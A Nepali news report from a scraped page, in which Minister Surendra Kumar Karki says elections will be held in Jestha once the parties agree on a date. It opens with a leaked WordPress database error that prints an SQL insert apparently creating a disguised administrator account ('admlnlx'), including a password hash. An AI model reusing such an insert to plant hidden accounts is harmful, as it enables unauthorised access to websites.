WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B75diprsJg0E0d4Bbsumon2WMDu00f.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 23:30:41', '', 'admlnlx', 'admlnlx')
विराटनगर,माघ २ –
सूचना तथा सञ्चारमन्त्री सुरेन्दकुमार कार्कीले निर्वाचन आउँदो जेठ महिनामा हुने बताउनुभएको छ ।
विराटनगर विमानस्थलमा आज सञ्चारकर्मीसँगको कुरा गर्दै सरकारका प्रवक्ता मन्त्री कार्कीले दलहरुबीच आपसी सहमति भएपछि मिति तोकिने जानकारी गराउनुभयो ।
मुलुकको संविधान प्रजातान्त्रिक र प्रगतिशील रहेको बताउँदै उहाँले मधेसको माग एकै पटकमा पूरा हुन नसक्ने स्पष्ट पार्नुभयो । स्थानीय निकायको निर्वाचन तहगत आधारमा हुने कि नहुने भन्ने पत्रकारको जिज्ञासामा प्रवक्ता कार्कीले निर्वाचन हुनु आवश्यक रहेको र स्थानीय तहलाई सबैभन्दा शक्तिशाली बनाइएको बताउनुभयो ।
उहाँले विधेयकका सम्बन्धमा संसदीय अभ्यासमा एमाले पार्टी आउनु सकारात्मक पक्ष रहेको धारणा प्रकट गर्नुभयो । – रासस